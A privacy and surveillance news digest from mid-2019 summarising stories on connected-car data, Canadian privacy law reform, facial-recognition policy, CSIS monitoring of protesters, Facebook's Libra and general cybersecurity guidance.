The Vancouver-based Freedom of Information and Privacy Association [FIPA] filed a complaint with the federal privacy commissioner, asking for an investigation of the gathering of drivers’ personal information by their vehicle. The complaint was filed along with its 2019 update to its “Connected Car” report [read 35 pg PDF here – & for the 2015 version see here], which evaluates privacy policies of 36 manufacturers to find what data they collected, how it was used, and why. The report estimates 98% of new cars in the U.S. and Europe will be connected to larger networks by 2021. These cars may collect travel data, monitor the driver’s typical speed and even the music they listen to. “Modern cars have become smartphones on wheels — mobile sensor networks, capable of gathering information about, and communicating with, their internal systems, other vehicles on the road, and local infrastructure,” said Canadian privacy commissioner David Therrien in a statement to a federal standing committee in May 2018. “Privacy is first and foremost about not surprising people,” said David Fraser, a privacy lawyer with McInnes Cooper. “When things happen with your information that you weren’t expecting, that’s when you feel intruded on. That’s the creepy factor.” Fraser says companies also have to contend with the risk a cyber-attack might reveal consumer data. For companies like car manufacturers, with limited experience in that realm, Fraser foresees an extra challenge. “All these things that used to be relatively simply have gotten much more complex,” he said. [Vancouver Sun]

CA – Toronto Leaders Urge Public Officials to ‘Welcome’ Sidewalk Labs’ Plan

A number of Toronto civic leaders, including former mayors, have written a joint statement urging public officials to welcome Sidewalk Labs’ Master Innovation Development Plan. The 30+ leaders say that Toronto should mobilize all of its talents to solve problems, including housing affordability. They write that public officials should “welcome and evaluate this proposal for the many positives it can bring.” The leaders behind the statement include Sharon Avery, the President and CEO of Toronto Foundation, Barbara Hall, the former mayor of Toronto, and Janet Ecker, the former Ontario finance minister. However, they write that although there are points worth debating in the plan, they believe there is room for the government to negotiate and adjust the plans. [MobileSyrup | Business leaders push for Sidewalk Labs smart-city development to be built on Toronto’s waterfront | Apple Publicly Trolls Google Over Controversial Smart City Surveillance Plans | Commissioner recommends updating privacy laws to prepare for smart cities | Sidewalk Labs decision to offload tough decisions on privacy to third party is wrong, says its former consultant | Ann Cavoukian still has problems with Sidewalk Labs’ approach to data with Quayside | From heated bike lanes to privacy concerns: What you need to know about Sidewalk Labs]

Surveillance

CA – Civil Liberties Group Publish CSIS Reports Related to Alleged Spying

The B.C. Civil Liberties Association has released thousands of heavily redacted documents by the Canadian Security Intelligence Service [CSIS] in regards to allegations the agency had spied on peaceful protesters of the now-defunct Enbridge Northern Gateway Pipeline project it has uploaded all the documents to a searchable website [see here]. The CSIS-disclosed documents had been held under a confidentiality order by the Security Intelligence Review Committee [SIRC], Canada’s spy agency watchdog, which recently expired. “What we’ve now received is a huge volume of secret evidence that we didn’t get to see at all before,” said lawyer Paul Champ, who’s representing the BCCLA. He told CBC’s Early Edition host Stephen Quinn the documents show over 500 CSIS reports about individuals or groups who had been protesting the pipeline proposal [listen here (7:30)]. The civil liberties association first challenged CSIS’ actions in 2014 with a complaint to SIRC alleging the agency was spying on pipeline opponents. The association further claimed the information was being shared with the National Energy Board and the petroleum industry. During private hearings with SIRC, CSIS disclosed the now-available documents. The complaint was dismissed, however, when the review committee concluded information had only been gathered on peaceful protesters as a by-product of investigations into legitimate threats, not as the goal. The BCCLA has been working to overturn the watchdog’s dismissal in Federal Court. [The remainder of this article includes topics covered under the following headers]: 1) Retaining information on protesters; 2) ‘Something we don’t expect to experience’; and 3) CSIS questioned if it was going too far. [CBC News | B.C. Civil Liberties Association releases Protest Papers showing CSIS surveillance of pipeline activists]

Telecom / TV

AU – Review Shows Australian Telecoms Receiving More Metadata Requests

While publishing their annual reports, three Australian government agencies revealed increases in metadata requests by law enforcement and other government entities. The Australian Securities and Investments Commission had a 44% increase in requests for prospective metadata and 25% for historic metadata. Meanwhile, the Independent Broad-based Anti-corruption Commission’s overall requests rose 11%, and the New South Wales Crime Commission saw increases of 153% for historic metadata and 106% for prospective metadata. Telecoms’ compliance costs related to the requests fell to $35 million from $119 million, according to the Australian Communications and Media Authority. [iTnews]

US Government Programs

US – The Privacy and Civil Liberties Oversight Board Will investigate NSA Surveillance, Facial Recognition, and Terror Watchlists

This week the Privacy and Civil Liberties Oversight Board [PCLOB] an independent agency in the executive branch released a strategic plan that does not shy away from investigating some of the biggest threats to privacy in the U.S. They will be looking into the NSA’s collection of phone records, facial recognition and other biometric technologies being used in airport security, the processes that govern terrorist watchlist, what they call “deep dive” investigations into NSA’s XKEYSCORE tool and the CIA’s counterterrorism activity, as well as many other government programs and procedures. [DeepLinks Blog (EFF)]

+++

16-30 June 2019

Biometrics

WW – Manufacturer of Body Cameras Bans Facial-Recognition Technology

Axon, the country’s leading manufacturer of police body cameras, announced it is banning the use of facial-recognition technology on its devices. The company made the announcement after consulting with an outside committee of researchers. “After a year of meetings and research, Axon’s AI and Policing Technology Ethics Board concluded that face recognition technology is not yet reliable enough to justify its use on body-worn cameras, and expressed particular concern regarding evidence of unequal and unreliable performance across races, ethnicities, genders and other identity groups,” the independent ethics board wrote in a statement. Earlier this year, San Francisco became the first city to ban the use of facial-recognition technology by law enforcement agencies. [The Hill]

US – Lawmakers Question Why CBP’s Facial-Recognition Program Collected US Citizens’ Data

U.S. House Democratic lawmakers want to know why Customs and Border Protection’s Biometric Exit Program includes data collected from U.S. citizens. The purpose of the program is to track when non-citizens arrive and depart from the country. Currently, U.S. citizens can opt out of the program, which is used in 17 airports, but lawmakers say the ability to opt out of the program isn’t enough. “The random nature of this pilot does not allow travelers the requisite advanced notice to make an informed decision on their willingness to participate,” lawmakers said in a letter to the CBP. [Fedscoop]

US – PCLOB to Review Use of Facial Recognition, Biometrics by Airport Security

The U.S. Privacy and Civil Liberties Oversight Board has announced it is launching three new projects, including one that will examine the use of facial-recognition technology and other biometric tech by aviation security. “The aviation-security project will examine how facial recognition and other biometric technologies are used to verify identity at each phase of a journey, from booking to baggage claim,” PCLOB said in its release, adding that the project will consider privacy and civil liberties concerns, along with functional benefits. PCLOB will also conduct reviews of the Federal Bureau of Investigation’s data searches under Section 702 of the Foreign Intelligence Surveillance Act and the use of airline passenger name records. [PCLOB]

US – Portland Addresses Facial Recognition, City Data Use With New Resolution

Lawmakers in Portland, Oregon, have approved a privacy resolution that aims to regulate facial-recognition software and the general use and collection of data within the city. The resolution includes a set of privacy and information principles that will aid decision making related to tech and data. A highlight among the principles is a list of suggested approaches for assessing the impacts of automated decision systems that use artificial intelligence or algorithmic models. Facial recognition remains the main target of the resolution and its principles. “City use of facial recognition technologies is likely going to be an early policy conversation given recent media attention, community concerns, and related policies moving forward in other cities,” said Hector Dominguez, open data coordinator at the City of Portland’s SmartCityPDX group. [Geekwire]

Big Data | Data Analytics | Artificial Intelligence

US – Ill. Legislature Passes Artificial Intelligence Video Interview Act

The Illinois Legislature has passed the Artificial Intelligence Video Interview Act. State employers cannot use AI to evaluate job interview videos under the law unless they obtain consent prior to the interview, as well as inform the candidate AI may be used to analyze the video, about how the AI works, and about the types of characteristics it will examine. Employers are not allowed to share the videos “except with persons whose expertise or technology is necessary in order to evaluate an applicant’s fitness for a position.” If signed by the governor, the bill would go into effect immediately, the report states. [Hunton Andrews Kurth’s Privacy & Information Security Law Blog]

Canada

CA – OPC Shares Views on Legislative Reform

Privacy Commissioner Daniel Therrien shared his perspectives on the how federal privacy legislation should be amended during a keynote address May 23, 2019 at the IAPP Canada Privacy Symposium 2019.’ In his remarks, he noted that the starting point for modernization should be to give a rights-based foundation. Some excerpts: Privacy is more than a set of technical or procedural rules, settings, controls and administrative safeguards. Instead, it is a fundamental right and a necessary precondition for the exercise of other fundamental rights, including freedom, equality and, as we saw in Cambridge Analytica, democracy I believe we have finally reached the point where the question of whether privacy legislation should be amended is behind us. The question before us now is how. With its announcement of a Digital Charter in the last few days, the government seems to agree. Legislative reform – for both PIPEDA and the Privacy Act – finally seems to be on its way. In recent months, we have been gratified to hear Parliamentary committees, and members of Parliament from all parties, saying that they support my office’s calls to update our laws. The government has finally responded with its Digital Charter announcement [see here & here] with more specific proposals, although still somewhat general, notably in the area of privacy. At this point, we are still analyzing these proposals. They cover a wide variety of issues, but they also leave grey zones. For instance, if the law provides exceptions to consent for “standard business practices,” how are privacy and the public good to be protected? Real question before us now is how Canada’s laws should be updated. The starting point should be to give the law a rights-based foundation. We should continue to have a law that is technology neutral and principles-based. These elements will enable the law to continue to endure over time and provide a level playing field. Legislation should also define privacy in its broadest and true sense. Privacy is not limited to consent, access and transparency. These are important mechanisms but they do not define the right itself, a quasi-constitutional right as we all know. PIPEDA should be drafted as a real statute, conferring rights and imposing obligations; it should not be drafted as an industry code of practice. Judges have commented on the “peculiar” nature of PIPEDA’s drafting. Others have been less charitable. The end result is that it is difficult to interpret and apply. It is possible to have principles-based legislation drafted intelligibly. We need look no further than to the substantially similar legislation adopted by some provincial legislatures. Some of the other questions that should be addressed during a review of PIPEDA include consent, binding guidance and enforcement powers. Accountability is also an important theme, it has led us to revisit our position on transborder data flows. The historic OPC position gave great weight to the accountability principle in protecting privacy in a transborder context. Yet we have seen that this principle as currently framed does not always provide effective protection. During our Equifax investigation, company officials had difficulty answering basic questions as to who was responsible for their clients’ personal information as between the Canadian and US affiliates. I must say I have read several interesting theories about what motivated this change in our position. No, I do not think I am Parliament. No, I am not fixated on the GDPR, nor with consent for that matter. However, I am very focused on finding and applying effective solutions to protect the privacy of Canadians, consistent with the law. The proposal to change our position was ultimately based on our obligation to ensure that our policies reflect a correct interpretation of the current law. Our starting point was a straightforward question of statutory interpretation. In the meantime, we do not expect organizations to change their practices, although, if we receive individual complaints, we will need to assess them based on the specific facts of the case before us and our interpretation of the law in its current form. One option under legislative reform might again be to adopt a more robust accountability regime – demonstrable accountability with actual monitoring to ensure the arrangements in place truly protect personal information. Minister Bains seemed to move in that direction in his [recent] privacy proposals we think consent is part of the short term solution, and is perhaps dictated by the current law. But should it have a role in the longer term? Maybe not, as long as there are other effective ways to protect privacy. [OPC]

CA – Ontario IPC Releases 2018 Annual Report

On June 27 Commissioner Beamish released the IPC’s 2018 annual report, Privacy and Accountability for a Digital Ontario, where he calls for the modernization of Ontario’s privacy laws to address the risks posed by the increasing use of digital technologies [read PR, 2 pg backgrounder]. Since his appointment as commissioner in 2015, he has emphasized the need to update Ontario privacy laws, which continue to fall behind rapidly evolving digital technologies such as biometric sensors, big data analytics, and artificial intelligence. The technology available today has the potential to unlock many benefits for communities and enable governments to deliver services more effectively and efficiently. However, many collect, use, and generate massive amounts of data, including personal information. The use of data and technology must not come at the expense of privacy; Ontario needs an updated legislative framework that includes effective and independent oversight of practices related to personal information. Political parties are also able to collect sensitive personal information and use it in ways that we could not have previously imagined. These advancements have revealed a widening gap in the protection and oversight of individual privacy rights. The most effective way of holding political parties accountable for how they collect, use, and disclose our personal information is by making them subject to the privacy requirements set out in Ontario’s access and privacy laws. Amendments to provide regulation and oversight would demonstrate a commitment to accountability and respect for individual privacy. I have also recommended that Ontario’s health sector seek to update its approach to privacy protection. My report details the impressive results realized through the use of artificial intelligence to curb unauthorized access. These technologies can identify minute anomalies in network systems, signalling breaches in real time. I would like to see the widespread use of AI to address the ongoing problem of unauthorized access in the health sector. My 2018 annual report also reveals a troubling number of unauthorized disclosure incidents through misdirected faxes. The majority of the over 11,000 health information privacy breaches reported by the health sector were due to misdirected faxes or emails. This is unacceptable. In the United Kingdom, the Health and Social Care Secretary has banned the NHS from buying fax machines and intends to phase out their use by March 31, 2020. It is time for Ontario to follow the UK’s lead and implement a strategy to eliminate or reduce dependence on fax machines in the delivery of health care. As technologies evolve, so should our response to privacy risks. [OIPC Blog]

CA – SK OIPC Releases 2018-19 Annual Report

Ronald Kruzeniski, the Saskatchewan Information and Privacy Commissioner, released his 2018-19 annual report on June 27 [PR]. In it he calls for the “modernization of our access and privacy legislation to ensure new threats to privacy are sufficiently addressed and citizens are able to access public records with greater ease.” Some highlights in the report include:

  • Trustees to require express consent before using recording or video devices to collect personal health information;
  • Clarify that an access to information request may be made on the prescribed form, in writing or electronically;
  • Mandate trustees when using electronic means to collect, use or disclose personal health information to create, maintain and regularly audit records of user activity of those systems;
  • Explicitly state that access to manuals, policies, guidelines or procedures, if not on a government institution’s or local authority’s website, is provided free of charge;
  • Require all personal health information be stored in Canada;
  • Provide the ability of the Commissioner to comment on the privacy implications of new technology;
  • Include a section making access easier for those with disabilities; and
  • Streamline the fee structure and provide that no citizen pays if the costs are under $200.

Last year, the office of the privacy commissioner opened 324 files — 21 fewer than the year before. Of the 324 cases, 144 were investigations, 126 were reviews, 52 were consultations and two were disregarded. Out of the 95 reports filed last year, 46% of public bodies or trustees fully complied, 41% partially complied and 9% did not comply. Any public body or trustee involved in a report is required to respond to the recommendations within 30 days; however, last year, 3% of them did not. One way to speed up the process, he noted, is allowing public bodies or trustees to appeal to court should they disagree with a recommendation — something Kruzeniski added to this year’s report. The office of the privacy commissioner closed 287 files last year. When it comes to these files’ resolutions, 13% were informally resolved and 12% came to an early resolution. 45% of the cases went to a report and 18% involved consultations. 12% were not proceeded with. [CJME News (Regina) | Privacy commissioner hopes to protect personal info, but ease access for citizens]

CA – SK OIPC Pushes to Have Binding Recommendations

Saskatchewan’s information and privacy commissioner is pushing for legislation that would require any public body to appeal to the courts if it disagrees with a recommendation from his office. The recommendation comes as part of the privacy commissioner’s 2018-2019 annual report [read PR], which outlined the accomplishments of the past year and goals for the future. Currently, the office reviews or investigates a file — such as a citizen being denied a freedom of information request — and makes a recommendation to the body from which the information is being sought. That body can then choose to comply with the recommendation or ignore it. “The citizen only has the choice of going to court, spending $10,000 or $15,000 to get a judge to look at it and make an order,” said Kruzeniski. “I think that’s an unfair burden and it’s time that this be switched around.” Kruzeniski has made dozens of recommendations for changes to the Freedom of Information and Protection of Privacy Act (FOIP), the Local Authority Freedom of Information and Protection of Privacy Act (LA FOIP) and the Health Information Protection Act (HIPA), which together establish the access to information and privacy rights of citizens. Kruzeniski said his work moving forward he was recently selected to serve a second five-year term will be focused on persuading the provincial government and its opposition to modernize information and privacy legislation to keep up with the digital era and national trends. One of those trends is more ordering powers for provincial information and privacy commissioners. “The Northwest Territories has introduced legislation that contemplates something similar, the federal government in Bill C-58 has given the information commissioner some ordering powers,” said Kruzeniski, adding commissioners in British Columbia, Alberta, Ontario, Quebec, Prince Edward Island and Newfoundland and Labrador also have stronger legislative powers when it comes to binding recommendations. In the 2018-2019 fiscal year, the office received 324 files. The office closed 287 files in that time, 45% of which went to the report stage. Of the 95 reports issued, 46% fully complied with recommendations, 41% partially complied, 9% did not comply and 3% did not respond. [Regina Leader-Post |

CA – SK Insurance Company Allowed to Share Drivers’ License Information

Saskatchewan Government Insurance can share information about citizens for parking enforcement purposes. Information and Privacy Commissioner Ronald Kruzeniski released a report last week explaining that the use of names and addresses of registered vehicle owners was upheld in the courts, noting the information is not considered private or sensitive. Kruzeniski’s report comes after a complaint of improper personal data disclosure by private parking company Impark. Kruzeniski has also recommended SGI should ask the Ministry of Justice to examine an amendment to the Freedom of Information and Privacy Act that could change the definition of personal information and reveal vehicle registration and license information. [CBC.ca | SGI can share your licence details without your consent, privacy commissioner confirms | SGI’s information handling causes stir]

CA – Opposition Leader Calls for NS OIPC to Have More Powers

Nova Scotia Opposition Leader Tim Houston called for the province’s information and privacy commissioner to have more legally binding powers. Houston’s comments come after it was announced the next court date for the Bay Ferries case will not occur until March 26, 2020. The Conservative Party of Canada attempted to find out how much of the $13.8 million in public funds to be paid to Bay Ferries will go to the company that has conducted the rides between Maine and Nova Scotia. Privacy Commissioner Catherine Tully had previously requested the information be made public. “If I have the privilege to be premier of this province I’m sure that giving order-making power to the privacy commissioner will at times cause a bit of embarrassment for the government,” Houston said. “But you have to take that. That will force better decision-making all along the way.” [Canadian Press]

Consumer

CA – Spy Agency Warns Campaign Teams ‘More Likely’ Targets of Cyber Attacks

If you are working on a political campaign, are a candidate, or political volunteer, you are poised to be a prime target for attempted foreign interference and cyber attacks in the coming federal election. That’s the message from the Communications Security Establishment [CSE] in its newly released “Cyber Security Guide for Campaign Teams” [see here]. It’s the first time a guide like this has been created by the federal electronic spy agency, and comes after the Canadian Centre for Cyber Security issued reports in 2017 [see “Cyber Threats To Canada’s Democratic Process” here & 38 pg PDF here] and 2019 [see “2019 Update: Cyber Threats to Canada’s Democratic Process” – here & 28 pg PDF here] warning that foreign interference in the fall federal campaign is “very likely” and that political campaigns are one of the higher-risk entities vulnerable to these attempts to meddle in the outcome of the election. The new guide includes general basic reminders such as not using free Wi-Fi, using two-factor authentication, and being wary of clicking suspicious links and offers tailored tips for campaign staff such as making rules about who will have access to certain information, like account passwords or donor lists, how to secure information when many campaign workers will likely be bringing in their own devices, and what to do if social media accounts are compromised. CSE’s advice is summarized by these five steps:

  • Assess what cybersecurity means for your campaign;
  • Understand where your data lives;
  • Secure your data and technology;
  • Provide cybersecurity training; and
  • Know what to dispose of or archive.

[CTV News]

CA – CSE Releases New Baseline Cybersecurity Controls

On April 5, 2019, the Canadian Centre for Cyber Security [CCCS] released the Baseline Cyber Security Controls for Small and Medium Organizations [see here] intended to assist small and medium organizations in Canada that want recommendations to improve their cyber security resiliency. The centre, part of the Communications Security Establishment (equivalent to the U.S. National Security Agency), was founded last October to work collaboratively with Canada’s critical infrastructure, academia, private industry and all levels of government to combat cyber threats, manage government cybersecurity incidents and provide other cyber-related services, education, Guidelines and training. The guidelines are intended to fill a critical gap for smaller enterprises that have been slow to adopt adequate cybersecurity protective measures. They are based on the so-called 80-20 rule where organizations can supposedly achieve 80% of the benefit from 20% of the effort to cybersecurity practices to achieve concrete gains and enhance cybersecurity efforts. The Guidelines therefore focus on providing a condensed set of advice and guidelines that the centre labeled “baseline cyber security controls” or “baseline control” – the most critical controls that smaller organizations (less than 499 employees) that wish to protect sensitive data should deploy to improve their cyber resiliency. Larger organizations are encouraged to invest in more comprehensive security coverage. The remainder of this post reviews the key recommendations including:

  • Developing an incident response plan;
  • Automatically patch operating systems and applications;
  • Enable security software ;
  • Securely configure devices;
  • Use strong user authentication;
  • Provide employee awareness training;
  • Back up and encrypt data;
  • Secure mobility;
  • Establish basic perimeter defences;
  • Secure cloud and outsourced IT services;
  • Secure websites;
  • Implement access control and authorization; and
  • Secure portable media.

The guidelines explicitly state that the foregoing base controls are intentionally aimed at small and medium-sized businesses to maximize the effectiveness of their limited cyber security spend and organizations looking to go beyond these controls should consider more comprehensive/robust cyber security measures such as the NIST Cyber Security Framework, the Center for Internet Security Controls, ISO/IEC 27001: 2013 or the CCCS IT Security Risk Management: A Lifecycle Approach. However there is little doubt that many small and medium-sized businesses will find the Guidelines to be a useful, if somewhat limited, starting point for good cybersecurity practices. [Canadian Lawyer Magazine]

WW – New Guidelines Aim to Make Privacy Policies More Meaningful For Users

Openly Operated is a new set of guidelines that examine how apps and websites manage user data while working to make privacy policies relevant for users. The three steps it takes for a company to get OO’s stamp of approval are demonstrated transparency, a detailed privacy policy, and final audit with published results. “We’ve kind of created this system today where the privacy policy is totally an afterthought for smaller companies. And for bigger companies, it becomes unmanageable, because you started out as a smaller company,” OO Co-Creator Johnny Lin said. “People before were taught to move fast and break things. Our solution is no, slow down — because when you do that user privacy goes in the backseat.” [The Vedrge]

E-Government

CA – Ontario Launches Digital and Data Task Force

Ontario’s Government has unveiled the next phase of consultations for Ontario’s Data Strategy [PR], which aims to ensure Ontarians have a say in how the data policy is shaped and how their personal privacy is protected. Today, Lisa Thompson, Minister of Government and Consumer Services, announced the members of the Minister’s Digital and Data Task Force [see list and bios] The second phase of consultations will include public and industry roundtables in six locations across the province from July through September [see here] and online options launching this summer will enable all people and businesses from across the province to share their input from anywhere, at any time. “During our first round of online consultations, the people of Ontario told us we need stronger data protections in place, and that they want to know and have control over how their data is used,” said Thompson. “Ontario’s Data Strategy will address their concerns” [see Phase 1 overview] Here are some quick facts about Ontario’s Data Strategy:

  1. Global business revenues for big data and business analytics products and services are forecasted to reach $189 billion (US dollars) in 2019;
  2. The Ontario Data Strategy will focus on three key pillars of activity: promoting public trust and confidence, creating economic benefits, and enabling better, smarter, efficient government; and
  3. The Data Strategy will be developed in consultation with the public, and in response to recommendations in Ernst and Young’s Line-by-Line Review and the Auditor General’s December 2018 report. [Ministry of Government and Consumer Services]

US – US Federal Agencies Must Move to Electronic Record Keeping by 2022

The US Office of Management and Budget (OMB) is directing federal agencies to convert to all digital records by the end of 2022. The National Archives and Records Administration (NARA) will accept only digital records as of January 1, 2023. A recent audit of NARA’s electronic records management oversight found that the agency was “not effectively exercising its oversight authority. As a result, permanent electronic records are still at a significant risk of loss and destruction.” [www.whitehouse.gov: Transition to Electronic Records | www.meritalk.com: OMB Directs Agencies to Make All Records Electronic | www.fedscoop.com: OMB issues guidance on NARA’s transition to electronic record keeping | www.oversight.gov: Audit of NARA’s Oversight of Electronic Records Management in the Federal Government]

US – State AGs Demand Election Security Help

Attorneys general from 22 US states have asked Congress to offer more grants, equipment standards, and other kinds of election security support to local officials. A coalition of the attorneys general sent letters with the requests to the chair people and ranking members of the Senate Appropriations Committee and the Senate Rules Committee. [thehill.com: State attorneys general demand that Congress take action on election security | www.govinfosecurity.com: 22 State Attorneys General Seek Election Security Help]

EU Developments

UK – ICO Puts Adtech Industry on Notice for Data Practices

In its report on advertising technology and real-time bidding, the U.K. Information Commissioner’s Office states the entire adtech industry has been operating illegally. ICO Executive Director for Technology and Innovation Simon McDougall said companies have not properly gathered consent to use personal data to serve ads. The ICO cited a lack of transparency in how data is processed and sold in RTB scenarios. Rather than single out companies, the ICO has given the adtech industry a six-month grace period to shore up its practices. “If you operate in the adtech space, it’s time to look at what you’re doing now, and to assess how you use personal data,” McDougall said. [FT.com]

EU – Grand Coalition Reaches Deal to Alter Germany’s Privacy Laws

The CDU/CSU and the Social Democrats have reached a deal on a new bill that would bring federal laws in line with the EU General Data Protection Regulation, as well as alter the Federal German Privacy Act. The second Data Protection Adaptation and Implementation Act increases the number of employees an organization has before they need to hire a data protection officer from 10 to 20. The parties also aim to clarify GDPR exemptions for journalists. (Original articles are in German.) [Frankfurter Allgemeine]

EU – Irish DPC Releases Guidance for Securing Cloud-Based Environments

The Irish Data Protection Commission released guidance for organizations to follow in order to ensure their cloud-based environments are secure. The commission recommends organizations review their default security settings, create clear policies and properly train staff, understand and monitor the data that is stored in cloud-based environments, and implement strong authentication procedures. “Cloud-based environments offer many advantages to organisations; however, they also introduce a number of technical security risks which organisations should be aware of, including data breaches, hijacking of accounts, and unauthorised access to personal data,” the DPC said in a statement. “Organisations should determine and implement a documented policy and apply the appropriate technical security and organisational measures to secure any cloud-based environments they utilise.” [Data Protection.ie]

EU – French Consumer Group Files Class-Action Against Google For Alleged GDPR Violations

French consumer group UFC Que Choisir has filed a class-action lawsuit against Google for alleged violations of the EU General Data Protection Regulation. The group claims Google’s confidentiality rules are in violation of the GDPR as the company does not make it easy for consumers to block user-location tracking or targeted ads. “We have high standards for transparency and consent based on both guidance from regulators and robust user testing, and we provide helpful information and easy-to-use privacy controls in our products,” Google said in a statement. Meanwhile, Google and the University of Chicago face a potential class-action lawsuit over their data-sharing practices involving patient health data. [ABC News]

EU – EU Considers Curtailing Some Automated Surveillance

EU regulators are contemplating a ban of certain automated surveillance tools following a panel review’s suggestions to do so. The panel, made up of industry and academic analysts, has suggested that regulators amend laws to mitigate the risks posed by the possible misuse of artificial intelligence, including facial-recognition software. The European Commission plans to study the panel’s findings and suggestions, which could lead to amendment proposals in 2020. “When it comes to artificial intelligence, it is important that we all promote an approach centered around what is human, where we protect our fundamental rights,” European Commissioner for Digital Economy and Society Mariya Gabriel said. [WSJ.com]

EU – CNIL Releases Updated Version of Its PIA Software Tool

France’s data protection authority, the CNIL, has updated its open-source privacy impact assessment software to help data controllers learn and demonstrate their compliance with the EU General Data Protection Regulation. The PIA software is intended primarily for new data controllers or those new to the PIA process. The software contains a user-friendly interface for simple management, legal and technical knowledge base ensuring the rights of data subjects, and customizable tool to help build compliance. The tool contains data from the GDPR, PIA guides and the security guide from the CNIL. Available in both French and English, the tool also helps demonstrate compliance with the CNIL. The IAPP Privacy Advisor featured an article on how to use the tool when the CNIL first launched the software. [CNIL.fr]

Finance

CA – Senate BANC Committee Issues Report on Open Banking

Last month, the Standing Senate Committee on Banking, Trade and Commerce [BANCe] released its report on open banking [see Open Banking: What it Means for You  & access other details] following hearings it held in the spring of 2019. The federal government, which has been conducting its own consultation [read PDF] into open banking, has yet to issue a report. ‘Open banking’ refers to a framework that enables consumers to share their personal financial data with financial services providers in a secure manner. Open banking is no small undertaking. To work, it will require major financial institutions to adopt standardized formats for data. It will also require the adoption of appropriate security measures. A regulator will have to create a list of approved open banking fintech providers. There will also need to be oversight from competition and privacy commissioners. For consumer privacy to be adequately protected there will have to be an overhaul of Canada’s Personal Information Protection and Electronic Documents Act [see OPC guidance]. [Teresa Scassa Blog]

WW – Facebook Announces Creation of Cryptocurrency Service

Facebook has created a financial service powered by a cryptocurrency called Libra. Facebook partnered with companies such as Mastercard and Uber for the project in hopes of officially launching next year. Anyone who wants to acquire Libra tokens will need to go through the tech company’s new subsidiary, Calibra. Users will have to show a form of government identification in order to receive the tokens. “Your financial data will never be used to target ads on Facebook,” Calibra Vice President of Product Kevin Weil said. In response to the announcement, U.S. Rep. Maxine Waters, D-Calif., called on Facebook to “agree to a moratorium” on the project until Congress and regulators have a chance to examine the situation given concerns about Facebook’s recent activity. Fortune also reports on the potential privacy implications of Facebook’s Libra project. [New York Times | Techcrunch: Facebook announces Libra cryptocurrency: All you need to know | Facebook Libra is ‘most invasive and dangerous form of surveillance ever designed’, critics say | Facebook’s Libra ‘Cryptocurrency’ Aims to Disrupt Payments. Bitcoin Aims to Disrupt Government Power]

WW – Facebook’s Currency Libra Faces Financial, Privacy Pushback

Facebook is getting a taste of the regulatory pushback it will face as it creates a new digital currency with corporate partners. Just hours after the social media giant unveiled early plans for the Libra cryptocurrency, French Finance Minister Bruno Le Maire insisted that only governments can issue sovereign currencies. He said Facebook must ensure that Libra won’t hurt consumers or be used for illegal activities. “We will demand guarantees that such transactions cannot be diverted, for example for financing terrorism,” he said. Facebook unveiled its much-rumored currency Tuesday and said it will launch publicly early next year with such partners as Uber, Visa, Mastercard and PayPal. Libra could open online purchasing to millions of people who do not have access to bank accounts and could reduce the cost of sending money across borders. It’s easy to see how attractive an alternative like Libra could be to people in countries beset with hyperinflation such as Venezuela. Libra poses new questions for the social network: Given that cryptocurrency is lightly regulated now, if at all, how will financial regulators oversee Facebook’s plan? And just how much more personal data will this give the social media giant, anyway? In the U.S., Democrat Rep. Maxine Waters the head of the House Financial Services Committee [here] wants Facebook to suspend plans for a new currency until Congress and regulators are able to study it more closely saying: “Facebook is continuing its unchecked expansion and extending its reach into the lives of its users.” Sen. Sherrod Brown of Ohio senior Democrat on the Senate Banking Committee [here] said Facebook’s new digital currency will give the tech giant unfair competitive advantages in collecting data on financial transactions as well as control over fees. “Facebook is already too big and too powerful.” Brown and Waters both called on financial regulators to examine the new currency project closely. In a statement, Facebook said, “We look forward to responding to lawmakers’ questions as this process moves forward.” Cryptocurrencies such as Libra store all transactions on a widely distributed, encrypted ledger known as the blockchain. Libra is designed so transaction amounts are visible, but transaction participants can be anonymous — at least until they move money into real-world accounts. Facebook said people can keep their individual transactions from appearing on the blockchain by using Calibra’s wallet app, though in that case, Calibra itself would have people’s data. Calibra said it won’t use financial data to target ads on Facebook. It also said it won’t share financial data with Facebook, though there are exceptions that haven’t been fully spelled out, including situations where data sharing would “keep people safe.” [The Associated Press | Finance, privacy experts skeptical of Facebook’s cryptocurrency ambitions | Facebook ‘Too Powerful’ to Run Libra Without Rules, Says Democratic Senator| Senate panel schedules a hearing on Facebook’s cryptocurrency | Facebook to be grilled by Congress on libra currency | Facebook called before Senate panel over digital currency project | The Senate will hold a hearing next month on Facebook’s Libra currency | Facebook announces Libra cryptocurrency: All you need to know | Facebook Libra is ‘most invasive and dangerous form of surveillance ever designed’, critics say | Facebook’s Libra ‘Cryptocurrency’ Aims to Disrupt Payments. Bitcoin Aims to Disrupt Government Power | Facebook’s currency Libra faces financial, privacy pushback | Finance, privacy experts skeptical of Facebook’s cryptocurrency ambitions

EU – EU Banks Working to Boost Revenue through Data Mining

EU banks are trying to catch up to big tech companies in the monetization of the data they collect. JPMorgan, HSBC and Barclays are among those trying to close the gap by using tactics such as extracting and analyzing data for stock predictions, marketing partnerships and expedited credit decisions. “We are now seeing some amazing uses of data in banking, and the reason is pretty simple: they know their clients better than anyone, they have a name and address, information about what you’re buying and once you have those you can do so much,” Accenture Head of Data Monetization Craig Macdonald said. statements. [Reuters]

FOI

US – SCOTUS Limits Access to Government Records, Drops Harm Requirement for Withholding “Confidential” Information

The Supreme Court narrowed public access to government documents by expanding the definition of “confidential” information. The 6-3 decision by Justice Gorsuch in Food Marketing Institute v. Argus Leader Media overturns four decades of case law which held that a company must show substantial competitive harm to block an open government request. Writing in dissent, Justice Breyer, joined by Justices Ginsburg and Sotomayor, emphasized that the FOIA required some showing of harm to prevent public release of business records collected by federal agencies. “The whole point of FOIA is to give the public access to information it cannot otherwise obtain.” In an amicus brief, EPIC warned the Court that removing the harm requirement “would deprive the public, and government watchdogs such as EPIC, of access to important information about ‘what the government is up to.’” EPIC described several of its own FOIA cases — including the now defunct airport body scanner program and the ongoing probe of Facebook — where access to commercial records made possible meaningful oversight and reform. Twenty members of the EPIC Advisory Board, distinguished experts in law, technology, and public policy, signed the amicus brief. [Electronic Privacy Information Center | Supreme Court limits access to government records in loss for Argus Leader, part of the USA TODAY Network | Politico | Opinion analysis: Court gives broad meaning to “confidential” in FOIA exemption for commercial and financial information]

CA – Some Baloney’ in Claims about New Federal Access-to-Information System

